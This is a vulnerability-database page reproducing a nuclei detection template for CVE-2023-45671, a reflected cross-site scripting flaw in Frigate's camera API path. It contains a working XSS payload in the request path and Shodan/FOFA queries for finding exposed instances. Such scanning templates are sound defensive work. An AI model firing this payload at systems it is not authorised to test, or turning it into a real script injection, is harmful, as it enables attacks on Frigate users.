Lucene search
K

Frigate < 0.13.0 Beta 3 - Cross-Site Scripting

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 61 Views

Frigate < 0.13.0 Beta 3 - Cross-Site Scripting vulnerability in API endpoint

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-45671
31 Oct 202301:20
circl
CNNVD
Frigate Cross-Site Scripting Vulnerability
30 Oct 202300:00
cnnvd
CVE
CVE-2023-45671
30 Oct 202322:41
cve
Cvelist
CVE-2023-45671 Frigate reflected XSS through `/<camera_name>` API endpoints
30 Oct 202322:41
cvelist
NVD
CVE-2023-45671
30 Oct 202323:15
nvd
OSV
CVE-2023-45671 Frigate reflected XSS through `/<camera_name>` API endpoints
30 Oct 202322:41
osv
Prion
Cross site scripting
30 Oct 202323:15
prion
Positive Technologies
PT-2023-29640 · Frigate · Frigate
30 Oct 202300:00
ptsecurity
RedhatCVE
CVE-2023-45671
9 Jan 202609:27
redhatcve
id: CVE-2023-45671

info:
  name: Frigate < 0.13.0 Beta 3 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/<camera_name>` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.
  impact: |
    Authenticated attackers can inject malicious JavaScript through unsanitized camera_name path values in API endpoints to execute attacks against Frigate users when they click specially crafted links.
  remediation: It has been fixed in version 0.13.0 Beta 3
  reference:
    - https://github.com/blakeblackshear/frigate/security/advisories/GHSA-jjxc-m35j-p56f
    - https://nvd.nist.gov/vuln/detail/CVE-2023-45671
    - https://securitylab.github.com/advisories/GHSL-2023-190_Frigate/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.7
    cve-id: CVE-2023-45671
    cwe-id: CWE-79
    epss-score: 0.01425
    epss-percentile: 0.69603
    cpe: cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: frigate
    product: frigate
    shodan-query:
      - title:"Frigate"
      - http.title:"frigate"
    fofa-query: title="frigate"
    google-query: intitle:"frigate"
  tags: cve,cve2023,frigate,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Camera named <img src=\"\" onerror=alert(document.domain)>")'
          - 'contains(header, "text/html")'
          - 'status_code == 404'
        condition: and
# digest: 4a0a00473045022100a453673d2466ff7a0bfadbd9719e75f21dbe1fa92df721ecc85fb737db03ae210220513feb5a90f645f93e40d93a80200fb286b39168b9229f78a46492049b0dd869:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.14.7
EPSS0.01425
61